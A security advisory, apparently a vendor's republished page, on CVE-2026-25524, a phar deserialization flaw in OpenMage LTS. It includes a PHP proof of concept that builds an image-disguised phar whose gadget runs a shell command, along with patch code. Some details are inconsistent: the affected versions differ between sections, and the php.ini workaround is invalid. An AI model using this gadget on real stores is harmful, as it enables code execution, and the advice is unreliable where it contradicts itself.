Summary
PHP functions such as getimagesize(), file_exists(), and is_readable() can trigger deserialization when processing phar:// stream wrapper paths. OpenMage LTS uses these functions with potentially controllable file paths during image validation and media handling. An attacker who can upload a malicious phar file (disguised as an image) and trigger one of these functions with a phar:// path can achieve arbitrary code execution.
| Metric | Value | Justification |
|---|---|---|
| Attack Vector (AV) | Network | Exploitable via file upload and web requests |
| Attack Complexity (AC) | High | Requires file upload + triggering phar:// access |
| Privileges Required (PR) | None | Some upload vectors don't require authentication |
| User Interaction (UI) | None | Exploitation is automatic once triggered |
| Scope (S) | Unchanged | Impacts the vulnerable component |
| Confidentiality (C) | High | Full system access via RCE |
| Integrity (I) | High | Arbitrary code execution |
| Availability (A) | High | Complete system compromise possible |
Affected Products
- OpenMage LTS versions < 20.16.1
- All versions derived from Magento 1.x with these code paths
Affected Files
| File | Line | Vulnerable Function |
|---|---|---|
app/code/core/Mage/Core/Model/File/Validator/Image.php |
72 | getimagesize($filePath) |
app/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php |
137 | getimagesize($item->getFilename()) |
lib/Varien/Image.php |
71 | $this->_getAdapter()->open($this->_fileName) |
Vulnerability Details
PHP's phar (PHP Archive) format stores metadata that is serialized. When PHP's stream wrapper functions access a file using the phar:// protocol, the metadata is automatically deserialized. This occurs even with seemingly safe functions like file_exists() or getimagesize().
A polyglot file can be crafted that is both a valid image (passing initial validation) and a valid phar archive containing malicious serialized objects. When the application later processes this file using phar://, the deserialization triggers a gadget chain leading to RCE.
Attack Flow
- Create polyglot file: Attacker creates a file that is both valid JPEG and valid PHAR
- Upload file: Attacker uploads the polyglot via product images, CMS media, or import
- Trigger phar:// access: Attacker causes the application to access the file using
phar://wrapper - Code execution: PHAR metadata deserialization triggers gadget chain
Proof of Concept
<?php
// Create malicious phar file
class ExploitGadget {
public $cmd = 'id > /tmp/pwned';
function __destruct() {
system($this->cmd);
}
}
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new ExploitGadget());
$phar->stopBuffering();
// Rename to appear as image
rename('exploit.phar', 'exploit.jpg');
// When getimagesize('phar://path/to/exploit.jpg') is called,
// the ExploitGadget::__destruct() method executes
Workarounds
If immediate upgrade is not possible:
Disable phar stream wrapper (if not needed):
; php.ini disable_functions = phar://Or in code:
stream_wrapper_unregister('phar');Strict upload validation: Implement additional validation beyond file extension
File storage isolation: Store uploads outside web root with randomized names
Web Application Firewall: Block requests containing
phar://in parameters
Credit
This vulnerability was discovered and responsibly disclosed by blackhat2013 through HackerOne.
Timeline
- 2025-12-31: Vulnerability reported via HackerOne
- 2026-01-21: Fix developed and tested
Impact
Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect. Typical impact: arbitrary code execution or logic abuse.
CVE-2026-25524 has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (20.17.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Block phar:// paths before passing to vulnerable functions:
// Before (vulnerable)
[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);
// After (fixed)
if (str_starts_with($filePath, 'phar://')) {
throw new Exception('Invalid image path.');
}
[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);
Additionally, ICO files (which cannot be re-encoded by GD) are now scanned for phar signatures:
__HALT_COMPILER();- Required phar stub<?php- PHP opening tag<?=- PHP short echo tag
Additional hardening measures:
ICO uploads removed: ICO file support is completely removed from new image uploads. This eliminates the polyglot attack vector entirely since all other image formats are re-encoded by GD, which strips any embedded phar metadata.
Phar wrapper disabled: The
phar://stream wrapper is unregistered at application bootstrap, preventing any phar deserialization attacks regardless of code path.Cache deserialization hardening: All
unserialize()calls on cached data now useallowed_classes => falseas defense-in-depth.
Note: Existing uploaded ICO files will continue to work. Only new ICO uploads will be rejected. Users are encouraged to use PNG favicons for new uploads.
Frequently Asked Questions
- What is CVE-2026-25524? CVE-2026-25524 is a high-severity insecure deserialization vulnerability in openmage/magento-lts (composer), affecting versions < 20.17.0. It is fixed in 20.17.0. Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect.
- How severe is CVE-2026-25524? CVE-2026-25524 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of openmage/magento-lts are affected by CVE-2026-25524? openmage/magento-lts (composer) versions < 20.17.0 is affected.
- Is there a fix for CVE-2026-25524? Yes. CVE-2026-25524 is fixed in 20.17.0. Upgrade to this version or later.
- Is CVE-2026-25524 exploitable, and should I be worried? Whether CVE-2026-25524 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-25524 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-25524? Upgrade
openmage/magento-ltsto 20.17.0 or later.